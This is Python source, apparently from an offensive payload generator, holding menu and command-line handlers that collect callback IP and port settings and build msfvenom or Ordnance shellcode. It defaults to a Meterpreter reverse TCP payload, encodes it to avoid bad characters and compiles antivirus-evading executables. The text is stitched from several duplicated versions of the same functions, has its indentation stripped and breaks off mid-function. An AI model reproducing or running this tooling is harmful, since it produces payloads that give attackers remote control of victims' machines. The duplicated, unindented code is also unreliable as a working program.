def cli_menu(self, invoked=False):
# --list-payloads
if self.command_options.list_payloads:
self.list_loaded_payloads()
sys.exit()
# Check if a payload is provided, and if so, start the generation
# process
# Missing -p ?
if not self.command_options.p:
print(helpers.color(" [!] ERROR: Missing --payload selection (-p <payload>). Try: -t Evasion --list-payloads", warning=True))
else:
user_cli_payload = self.return_payload_object(self.command_options.p)
if not user_cli_payload:
print(helpers.color(" [!] ERROR: You did not provide a valid payload selection!", warning=True))
print(helpers.color(" [*] Ex: info 2 OR info lua/shellcode_inject/flat.py", warning=True))
sys.exit()
if self.command_options.ip is None and ("meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path):
print(helpers.color(" [!] ERROR: You did not provide an IP/domain to connect to/bind on", warning=True))
sys.exit()
# Make sure IP is valid
# --ip
if self.command_options.ip is not None:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(self.command_options.ip)
if not valid_ip and not valid_hostname:
print(helpers.color(" [!] ERROR: You did not provide a valid ip/domain!", warning=True))
print(helpers.color("[*] Please specify the correct value", warning=True))
sys.exit()
# Determine if using Ordnance or MSFVenom for shellcode generation
if self.command_options.ordnance_payload is None and self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path:
print(helpers.color(" [!] ERROR: You did not provide a shellcode option to use!", warning=True))
sys.exit()
# Check if using a pure payload (shellcodeless)
if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path:
if "meterpreter" in user_cli_payload.path:
# Check for where the IP is being stored
if "LHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["LHOST"][0] = self.command_options.ip
elif "RHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["RHOST"][0] = self.command_options.ip
# Store the LPORT value in the payload
if "LPORT" in user_cli_payload.required_options:
user_cli_payload.required_options["LPORT"][0] = self.command_options.port
else:
# If ordnance, generate shellcode through it
if self.command_options.ordnance_payload is not None:
Ordnance_object = ordnance_import.Tools(self.command_options)
Ordnance_object.cli_menu(invoked=True)
cli_shellcode = Ordnance_object.final_shellcode
# Or if msfvenom, get that code
elif self.command_options.msfvenom is not None:
cli_shellcode = shellcode_help.cli_msf_shellcode_gen(self.command_options)
# This could be the future area for adding custom shellcode. If there
# is a need I can add it in
# Set the shellcode in the Evasion payload
user_cli_payload.cli_shellcode = cli_shellcode
# Loop over setting required options
# -c
if self.command_options.c is not None:
for payload_option in self.command_options.c:
if payload_option != '':
if "=" not in payload_option:
print(helpers.color(" [!] Payload option not entered in correct syntax.\n", warning=True))
sys.exit()
else:
key = payload_option.split('=')[0].upper()
value = payload_option.split('=')[1]
if key in user_cli_payload.required_options:
user_cli_payload.required_options[key][0] = value
else:
print(helpers.color(" [!] The option " + key + " does not exist for the selected payload!.\n", warning=True))
sys.exit()
# Generate the payload code
# source code stored in user_cli_payload.source_code
user_cli_payload.generate()
# figure out how to compile the code
outfile.compiler(user_cli_payload, invoked=True, cli_object=self.command_options)
return
def use_payload(self, selected_payload):
# Tab completion, thanks Will :)
comp = completer.PayloadCompleter(self.payload_option_commands, selected_payload)
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
self.display_payload_options(selected_payload)
payload_options_command = ""
evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
while True:
payload_options_command = input("[" + selected_payload.path + ">>]: ").strip().lower()
if payload_options_command.startswith("back") or payload_options_command.startswith("main") or payload_options_command.startswith("menu"):
break
elif payload_options_command.startswith("gen") or payload_options_command.startswith("run"):
# Checking for Ruby specific payloads because of dumbass sleep check
if selected_payload.language == 'ruby' and selected_payload.required_options["SLEEP"][0] != "X" and selected_payload.required_options["USERNAME"][0] == "X" and selected_payload.required_options["DOMAIN"][0] == "X" and selected_payload.required_options["HOSTNAME"][0] == "X":
print(helpers.color("[*] If using SLEEP check with Ruby, you must also provide an additional check (like HOSTNAME)!", warning=True))
else:
selected_payload.generate()
if outfile.compiler(selected_payload):
break
elif payload_options_command.startswith("exit") or payload_options_command.startswith("quit"):
sys.exit(0)
elif payload_options_command.startswith("help") or payload_options_command.startswith("option"):
self.print_options_screen(selected_payload)
evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
elif payload_options_command.startswith("set"):
if len(payload_options_command.split()) == 3:
set_command, key, value = payload_options_command.split()
# Make sure it is uppercase
key = key.upper()
if key in selected_payload.required_options:
# Validate LHOST value
if key == "LHOST":
if helpers.validate_ip(value):
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid IP!", warning=True))
print()
# Validate LPORT
elif key == "LPORT":
if helpers.validate_port(value):
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid port number!", warning=True))
print()
else:
# Set other options
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid option!", warning=True))
print(helpers.color(" [*] Ex: set LHOST 8.8.8.8", warning=True))
print()
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid amount of arguments!", warning=True))
print(helpers.color(" [*] Ex: set DOMAIN christest.com", warning=True))
print()
return
def cli_menu(self, invoked=False):
# Check to see if we're just listing payloads or encoders
# If so, do that and then exit
# --list-payloads
if self.command_options.list_payloads:
self.print_payloads()
sys.exit()
# --list-encoders
elif self.command_options.list_encoders:
self.print_encoders()
sys.exit()
# Now let's check for payloads we're doing
# Missing --ordnance-payload ?
if not self.command_options.ordnance_payload:
print(helpers.color(" [!] ERROR: Missing ordnance-payload selection (--ordnance-payload <payload>). Try: -t Ordnance --list-payloads", warning=True))
else:
payload_selected = self.command_options.ordnance_payload.lower()
payload = self.return_payload_object(payload_selected)
if not payload:
print(helpers.color(" [!] ERROR: You specified a non-existent Ordnance payload!", warning=True))
sys.exit()
else:
if "LHOST" in payload.required_options:
# Is --ip missing?
if self.command_options.ip is None:
print(helpers.color(" [!] ERROR: Missing --ip <value>", warning=True))
sys.exit()
else:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(self.command_options.ip)
if valid_ip:
payload.required_options["LHOST"][0] = self.command_options.ip
elif valid_hostname:
if payload.cli_name == 'rev_tcp_dns':
payload.required_options["LHOST"][0] = self.command_options.ip
else:
print(helpers.color(" [!] ERROR: Invalid IP/Hostname specified!", warning=True))
sys.exit()
else:
print(helpers.color(" [!] ERROR: Invalid IP/Hostname specified!", warning=True))
sys.exit()
if "LPORT" in payload.required_options:
if 0 < self.command_options.port < 65535:
payload.required_options["LPORT"][0] = self.command_options.port
else:
print(helpers.color(" [!] ERROR: Invalid port number provided!", warning=True))
print(helpers.color("[*] Try again?", warning=True))
sys.exit()
# Generate the original shellcode
payload.cli_gen_shellcode()
self.final_shellcode = payload.customized_shellcode
# Check if an encoder is being called by the user
if self.command_options.encoder is not None:
encoder_found_here = False
if "BadChars" in payload.required_options:
payload.required_options["BadChars"][0] = self.command_options.bad_chars
for loaded_encoder in self.active_encoders.values():
if self.command_options.encoder.lower() == loaded_encoder.cli_name:
encoder_found_here = True
loaded_encoder.cli_encode(payload)
if not encoder_found_here:
print(helpers.color(" [!] ERROR: Encoder you specified was not found!", warning=True))
print(helpers.color("[*] Try again?", warning=True))
sys.exit()
self.final_shellcode = payload.customized_shellcode
if invoked:
pass
else:
payload.payload_stats()
return
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on
loaded metasploit payloads.
"""
selected_payload = None
options = None
showMessage = False
if settings.TERMINAL_CLEAR != "false":
showMessage = True
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.custom_shellcode == "":
# show banner?
if settings.TERMINAL_CLEAR != "false":
showMessage = True
# prompt for custom shellcode or msfvenom
custom_shellcode = self.payload_selection_menu(showMessage)
# if custom shellcode is specified, set it
if custom_shellcode == "ordnance":
# Start figuring out Ordnance stuff here
self.invoke_ordnance = True
elif custom_shellcode:
self.custom_shellcode = custom_shellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completer.MSFCompleter(self.payload_tree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while selected_payload is None:
print('\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True))
print(' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True))
try:
selected_payload = self.required_options['MSF_PAYLOAD'][0]
print(' [>] Please enter metasploit payload: %s' % (selected_payload))
except:
selected_payload = input(' [>] Please enter metasploit payload: ').strip().lower()
if selected_payload == "":
# default to reverse_tcp for the payload
selected_payload = "windows/meterpreter/reverse_tcp"
try:
parts = selected_payload.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payload_tree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
if 'PAYLOAD' in self.required_options:
del self.required_options['PAYLOAD']
print(helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True))
selected_payload = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = selected_payload
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
try:
value = self.required_options['LHOST'][0]
print(' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value))
except:
# set the completer to fill in the local IP
readline.set_completer(completer.IPCompleter().complete)
value = input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a IP validation check
if not helpers.validate_ip(value):
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ''
print(helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True))
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.validate_hostname(value):
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ''
print(helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True))
value = ""
# if we don't have at least one period in the hostname/IP
else:
if 'LHOST' in self.required_options:
del self.required_options['LHOST']
print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ''
print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
value = ""
else:
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ''
print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
value = ""
elif option == "LPORT":
try:
value = self.required_options['LPORT'][0]
print(' [>] Enter value for \'LPORT\': %s' % (value))
except:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completer.MSFPortCompleter().complete)
value = input(' [>] Enter value for \'LPORT\': ').strip()
try:
if int(value) <= 0 or int(value) >= 65535:
print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
if 'LPORT' in self.required_options:
self.required_options['LPORT'][0] = ''
value = ""
except ValueError:
print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
if 'LPORT' in self.required_options:
self.required_options['LPORT'][0] = ''
value = ""
else:
value = input(' [>] Enter value for \'' + option + '\': ').strip()
# append all the msfvenom options
self.msfvenom_options.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extra_msf_options = list()
while True:
# clear out the tab completion
readline.set_completer(completer.none().complete)
selection = input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2): ').strip()
if selection != "":
num_extra_options = selection.split(' ')
for xtra_opt in num_extra_options:
if xtra_opt is not '':
if "=" not in xtra_opt:
print(helpers.color(" [!] Parameter not entered in correct syntax.\n", warning=True))
continue
if "-" in xtra_opt.split('=')[0]:
final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
extra_msf_options.append(final_opt)
else:
final_opt = xtra_opt.split('=')[0] + "=" + xtra_opt.split('=')[1]
extra_msf_options.append(final_opt)
else:
break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenom_options = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenom_options = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
self.msfvenomCommand = "msfvenom " + msfvenom_options + " -p " + selected_payload
for option in self.msfvenom_options:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extra_msf_options) != 0:
self.msfvenomCommand += " " + " ".join(extra_msf_options)
self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
return
def use_payload(self, selected_payload):
# Tab completion, thanks Will :)
comp = completer.PayloadCompleter(self.payload_option_commands, selected_payload)
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
self.display_payload_options(selected_payload)
payload_options_command = ""
evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
while True:
payload_options_command = input("[" + selected_payload.path + ">>]: ").strip().lower()
if payload_options_command.startswith("back") or payload_options_command.startswith("main") or payload_options_command.startswith("menu"):
break
elif payload_options_command.startswith("gen") or payload_options_command.startswith("run"):
# Checking for Ruby specific payloads because of dumbass sleep check
if selected_payload.language == 'ruby' and selected_payload.required_options["SLEEP"][0] != "X" and selected_payload.required_options["USERNAME"][0] == "X" and selected_payload.required_options["DOMAIN"][0] == "X" and selected_payload.required_options["HOSTNAME"][0] == "X":
print(helpers.color("[*] If using SLEEP check with Ruby, you must also provide an additional check (like HOSTNAME)!", warning=True))
else:
selected_payload.generate()
if outfile.compiler(selected_payload):
break
elif payload_options_command.startswith("exit") or payload_options_command.startswith("quit"):
sys.exit(0)
elif payload_options_command.startswith("help") or payload_options_command.startswith("option"):
self.print_options_screen(selected_payload)
evasion_helpers.print_dict_message(self.payload_option_commands, show_title=False)
elif payload_options_command.startswith("set"):
if len(payload_options_command.split()) == 3:
set_command, key, value = payload_options_command.split()
# Make sure it is uppercase
key = key.upper()
if key in selected_payload.required_options:
# Validate LHOST value
if key is "LHOST":
if helpers.validate_ip(value):
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid IP!", warning=True))
print()
# Validate LPORT
elif key is "LPORT":
if helpers.validate_port(value):
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid port number!", warning=True))
print()
else:
# Set other options
selected_payload.required_options[key][0] = value
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid option!", warning=True))
print(helpers.color(" [*] Ex: set LHOST 8.8.8.8", warning=True))
print()
else:
print()
print(helpers.color(" [!] ERROR: You did not provide a valid amount of arguments!", warning=True))
print(helpers.color(" [*] Ex: set DOMAIN christest.com", warning=True))
print()
return
def cli_menu(self, invoked=False):
# Check to see if we're just listing payloads or encoders
# If so, do that and then exit
if self.command_options.list_payloads:
self.print_payloads()
sys.exit()
elif self.command_options.list_encoders:
self.print_encoders()
sys.exit()
# Now let's check for payloads we're doing
if self.command_options.ordnance_payload:
payload_found = False
for payload in self.active_shellcode.values():
if self.command_options.ordnance_payload.lower(
) == payload.cli_name:
payload_found = True
if "LHOST" in payload.required_options:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(
self.command_options.ip)
if valid_ip:
payload.required_options["LHOST"][
0] = self.command_options.ip
elif valid_hostname:
if payload.cli_name == 'rev_tcp_dns':
payload.required_options["LHOST"][
0] = self.command_options.ip
else:
print(
helpers.color(
"[*] Error: Invalid IP/Hostname specified!",
warning=True))
print(
helpers.color("[*] Try again?",
warning=True))
sys.exit()
else:
print(
helpers.color(
"[*] Error: Invalid IP/Hostname specified!",
warning=True))
print(helpers.color("[*] Try again?",
warning=True))
sys.exit()
if "LPORT" in payload.required_options:
if 0 < self.command_options.port < 65535:
payload.required_options["LPORT"][
0] = self.command_options.port
else:
print(
helpers.color(
"[*] Error: Invalid port number provided!",
warning=True))
print(helpers.color("[*] Try again?",
warning=True))
sys.exit()
# Generate the original shellcode
payload.cli_gen_shellcode()
self.final_shellcode = payload.customized_shellcode
# Check if an encoder is being called by the user
if self.command_options.encoder is not None:
encoder_found_here = False
if "BadChars" in payload.required_options:
payload.required_options["BadChars"][
0] = self.command_options.bad_chars
for loaded_encoder in self.active_encoders.values():
if self.command_options.encoder.lower(
) == loaded_encoder.cli_name:
encoder_found_here = True
loaded_encoder.cli_encode(payload)
if not encoder_found_here:
print(
helpers.color(
"[*] Error: Encoder you specified was not found!",
warning=True))
print(helpers.color("[*] Try again?",
warning=True))
sys.exit()
self.final_shellcode = payload.customized_shellcode
if invoked:
pass
else:
payload.payload_stats()
# If the payload supplied isn't found
if not payload_found:
print(
helpers.color(
"[*] Error: You specified a non-existent Ordnance payload!",
warning=True))
print(
helpers.color("[*] Go to start... do not collect $200!",
warning=True))
sys.exit()
def cli_menu(self, invoked=False):
# --list-payloads
if self.command_options.list_payloads:
self.list_loaded_payloads()
sys.exit()
# Check if a payload is provided, and if so, start the generation
# process
# Missing -p ?
if not self.command_options.p:
print(helpers.color(" [!] ERROR: Missing --payload selection (-p <payload>). Try: -t Evasion --list-payloads", warning=True))
else:
user_cli_payload = self.return_payload_object(self.command_options.p)
if not user_cli_payload:
print(helpers.color(" [!] ERROR: You did not provide a valid payload selection!", warning=True))
print(helpers.color(" [*] Ex: info 2 OR info lua/shellcode_inject/flat.py", warning=True))
sys.exit()
if self.command_options.ip is None and ("meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path):
print(helpers.color(" [!] ERROR: You did not provide an IP/domain to connect to/bind on", warning=True))
sys.exit()
# Make sure IP is valid
# --ip
if self.command_options.ip is not None:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(self.command_options.ip)
if not valid_ip and not valid_hostname:
print(helpers.color(" [!] ERROR: You did not provide a valid ip/domain!", warning=True))
print(helpers.color("[*] Please specify the correct value", warning=True))
sys.exit()
# Determine if using Ordnance or MSFVenom for shellcode generation
if self.command_options.ordnance_payload is None and self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path:
print(helpers.color(" [!] ERROR: You did not provide a shellcode option to use!", warning=True))
sys.exit()
# Check if using a pure payload (shellcodeless)
if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path:
if "meterpreter" in user_cli_payload.path:
# Check for where the IP is being stored
if "LHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["LHOST"][0] = self.command_options.ip
elif "RHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["RHOST"][0] = self.command_options.ip
# Store the LPORT value in the payload
if "LPORT" in user_cli_payload.required_options:
user_cli_payload.required_options["LPORT"][0] = self.command_options.port
else:
# If ordnance, generate shellcode through it
if self.command_options.ordnance_payload is not None:
Ordnance_object = ordnance_import.Tools(self.command_options)
Ordnance_object.cli_menu(invoked=True)
cli_shellcode = Ordnance_object.final_shellcode
# Or if msfvenom, get that code
elif self.command_options.msfvenom is not None:
cli_shellcode = shellcode_help.cli_msf_shellcode_gen(self.command_options)
# This could be the future area for adding custom shellcode. If there
# is a need I can add it in
# Set the shellcode in the Evasion payload
user_cli_payload.cli_shellcode = cli_shellcode
# Loop over setting required options
# -c
if self.command_options.c is not None:
for payload_option in self.command_options.c:
if payload_option is not '':
if "=" not in payload_option:
print(helpers.color(" [!] Payload option not entered in correct syntax.\n", warning=True))
sys.exit()
else:
key = payload_option.split('=')[0].upper()
value = payload_option.split('=')[1]
if key in user_cli_payload.required_options:
user_cli_payload.required_options[key][0] = value
else:
print(helpers.color(" [!] The option " + key + " does not exist for the selected payload!.\n", warning=True))
sys.exit()
# Generate the payload code
# source code stored in user_cli_payload.source_code
user_cli_payload.generate()
# figure out how to compile the code
outfile.compiler(user_cli_payload, invoked=True, cli_object=self.command_options)
return
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on
loaded metasploit payloads.
"""
selected_payload = None
options = None
showMessage = False
if settings.TERMINAL_CLEAR != "false":
showMessage = True
# if no generation method has been selected yet
if self.msfvenomCommand == '' and self.custom_shellcode == '':
# show banner?
if settings.TERMINAL_CLEAR != "false":
showMessage = True
# prompt for custom shellcode or msfvenom
custom_shellcode = self.payload_selection_menu(showMessage)
# if custom shellcode is specified, set it
if custom_shellcode == "ordnance":
# Start figuring out Ordnance stuff here
self.invoke_ordnance = True
elif custom_shellcode:
self.custom_shellcode = custom_shellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completer.MSFCompleter(self.payload_tree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while selected_payload is None:
print('\n [*] Press %s for windows/meterpreter/reverse_tcp' % helpers.color('[enter]', yellow=True))
print(' [*] Press %s to list available payloads' % helpers.color('[tab]', yellow=True))
try:
selected_payload = self.required_options['MSF_PAYLOAD'][0]
print(' [>] Please enter metasploit payload: %s' % (selected_payload))
except:
selected_payload = input(' [>] Please enter metasploit payload: ').strip().lower()
if selected_payload == '':
# default to reverse_tcp for the payload
selected_payload = "windows/meterpreter/reverse_tcp"
try:
parts = selected_payload.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payload_tree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
if 'PAYLOAD' in self.required_options:
del self.required_options['PAYLOAD']
print(helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True))
selected_payload = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = selected_payload
# request a value for each required option
for option in options:
value = ""
while value == '':
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
try:
value = self.required_options['LHOST'][0]
print(' [>] Enter value for \'LHOST\', [tab] for local IP: %s' % (value))
except:
# set the completer to fill in the local IP
readline.set_completer(completer.IPCompleter().complete)
value = input(' [>] Enter value for \'LHOST\', [tab] for local IP: ').strip()
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a IP validation check
if not helpers.validate_ip(value):
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ""
print(helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True))
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.validate_hostname(value):
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ""
print(helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True))
value = ""
# if we don't have at least one period in the hostname/IP
else:
if 'LHOST' in self.required_options:
del self.required_options['LHOST']
print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ""
print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
value = ""
else:
if 'LHOST' in self.required_options:
self.required_options['LHOST'][0] = ""
print(helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True))
value = ""
elif option == "LPORT":
try:
value = self.required_options['LPORT'][0]
print(' [>] Enter value for \'LPORT\': %s' % (value))
except:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completer.MSFPortCompleter().complete)
value = input(' [>] Enter value for \'LPORT\': ').strip()
try:
if int(value) <= 0 or int(value) >= 65535:
print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
if 'LPORT' in self.required_options:
self.required_options['LPORT'][0] = ""
value = ""
except ValueError:
print(helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True))
if 'LPORT' in self.required_options:
self.required_options['LPORT'][0] = ""
value = ""
else:
value = input(' [>] Enter value for \'' + option + '\': ').strip()
# append all the msfvenom options
self.msfvenom_options.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extra_msf_options = list()
while True:
# clear out the tab completion
readline.set_completer(completer.none().complete)
selection = input(' [>] Enter any extra msfvenom options (syntax: OPTION1=value1 or -OPTION2=value2): ').strip()
if selection != '':
num_extra_options = selection.split(' ')
for xtra_opt in num_extra_options:
if xtra_opt is not '':
if "=" not in xtra_opt:
print(helpers.color(" [!] Parameter not entered in correct syntax.\n", warning=True))
continue
if "-" in xtra_opt.split('=')[0]:
final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
extra_msf_options.append(final_opt)
else:
final_opt = xtra_opt.split('=')[0] + "=" + xtra_opt.split('=')[1]
extra_msf_options.append(final_opt)
else:
break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenom_options = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenom_options = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
self.msfvenomCommand = "msfvenom " + msfvenom_options + " -p " + selected_payload
for option in self.msfvenom_options:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extra_msf_options) != 0:
self.msfvenomCommand += " " + " ".join(extra_msf_options)
self.msfvenomCommand += " -f c | tr -d \'\"\' | tr -d \'\\n\'"
return
def cli_menu(self, invoked=False):
if self.command_options.list_payloads:
self.list_loaded_payloads()
if self.command_options.generate_awl:
self.generate_awl()
# check if a payload is provided, and if so, start the generation
# process
elif self.command_options.p:
user_cli_payload = self.return_payload_object(
self.command_options.p)
if not user_cli_payload:
print(
helpers.color(
"[*] Error: You did not provide a valid payload selection!",
warning=True))
print(
helpers.color(
"[*] Ex: info 2 or info msbuild/shellcode_inject/virutal.py",
warning=True))
sys.exit()
if self.command_options.ip is None and (
"meterpreter" in user_cli_payload.path
or "shellcode_inject" in user_cli_payload.path):
print(
helpers.color(
"[*] Error: You did not provide an IP/domain to connect to/bind on",
warning=True))
sys.exit()
# Make sure IP is valid
if self.command_options.ip is not None:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(
self.command_options.ip)
if not valid_ip and not valid_hostname:
print(
helpers.color(
"[*] Error: You did not provide a valid ip/domain!",
warning=True))
print(
helpers.color("[*] Please specify the correct value",
warning=True))
sys.exit()
# Determine if using MSFVenom for shellcode generation
if self.command_options.msfvenom is None and "meterpreter" not in user_cli_payload.path:
print(
helpers.color(
"[*] Error: You did not provide a shellcode option to use!",
warning=True))
sys.exit()
# Check if using a pure payload (shellcodeless)
if "meterpreter" in user_cli_payload.path or "shellcode_inject" in user_cli_payload.path:
if "meterpreter" in user_cli_payload.path:
# Check for where the IP is being stored
if "LHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["LHOST"][
0] = self.command_options.ip
elif "RHOST" in user_cli_payload.required_options:
user_cli_payload.required_options["RHOST"][
0] = self.command_options.ip
# Store the LPORT value in the payload
if "LPORT" in user_cli_payload.required_options:
user_cli_payload.required_options["LPORT"][
0] = self.command_options.port
else:
# if msfvenom, get that code
if self.command_options.msfvenom is not None:
cli_shellcode = shellcode_help.cli_msf_shellcode_gen(
self.command_options)
# This could be the future area for adding custom shellcode. If there
# is a need I can add it in
# Set the shellcode in the Bypass payload
user_cli_payload.cli_shellcode = cli_shellcode
# Loop over setting required options
if self.command_options.c is not None:
for payload_option in self.command_options.c:
if payload_option is not '':
if "=" not in payload_option:
print(
helpers.color(
" [!] Payload option not entered in correct syntax.\n",
warning=True))
sys.exit()
else:
key = payload_option.split('=')[0].upper()
value = payload_option.split('=')[1]
if key in user_cli_payload.required_options:
user_cli_payload.required_options[key][
0] = value
else:
print(
helpers.color(
" [!] The option " + key +
" does not exist for the selected payload!.\n",
warning=True))
sys.exit()
# Generate the payload code
# source code stored in user_cli_payload.source_code
user_cli_payload.generate()
# figure out how to compile the code
outfile.compiler(user_cli_payload,
invoked=True,
cli_object=self.command_options)
return
def cli_menu(self, invoked=False):
# Check to see if we're just listing payloads or encoders
# If so, do that and then exit
# --list-payloads
if self.command_options.list_payloads:
self.print_payloads()
sys.exit()
# --list-encoders
elif self.command_options.list_encoders:
self.print_encoders()
sys.exit()
# Now let's check for payloads we're doing
# Missing --ordnance-payload ?
if not self.command_options.ordnance_payload:
print(helpers.color(" [!] ERROR: Missing ordnance-payload selection (--ordnance-payload <payload>). Try: -t Ordnance --list-payloads", warning=True))
else:
payload_selected = self.command_options.ordnance_payload.lower()
payload = self.return_payload_object(payload_selected)
if not payload:
print(helpers.color(" [!] ERROR: You specified a non-existent Ordnance payload!", warning=True))
sys.exit()
else:
if "LHOST" in payload.required_options:
# Is --ip missing?
if self.command_options.ip is None:
print(helpers.color(" [!] ERROR: Missing --ip <value>", warning=True))
sys.exit()
else:
valid_ip = helpers.validate_ip(self.command_options.ip)
valid_hostname = helpers.validate_hostname(self.command_options.ip)
if valid_ip:
payload.required_options["LHOST"][0] = self.command_options.ip
elif valid_hostname:
if payload.cli_name == 'rev_tcp_dns':
payload.required_options["LHOST"][0] = self.command_options.ip
else:
print(helpers.color(" [!] ERROR: Invalid IP/Hostname specified!", warning=True))
sys.exit()
else:
print(helpers.color(" [!] ERROR: Invalid IP/Hostname specified!", warning=True))
sys.exit()
if "LPORT" in payload.required_options:
if 0 < self.command_options.port < 65535:
payload.required_options["LPORT"][0] = self.command_options.port
else:
print(helpers.color(" [!] ERROR: Invalid port number provided!", warning=True))
print(helpers.color("[*] Try again?", warning=True))
sys.exit()
# Generate the original shellcode
payload.cli_gen_shellcode()
self.final_shellcode = payload.customized_shellcode
# Check if an encoder is being called by the user
if self.command_options.encoder is not None:
encoder_found_here = False
if "BadChars" in payload.required_options:
payload.required_options["BadChars"][0] = self.command_options.bad_chars
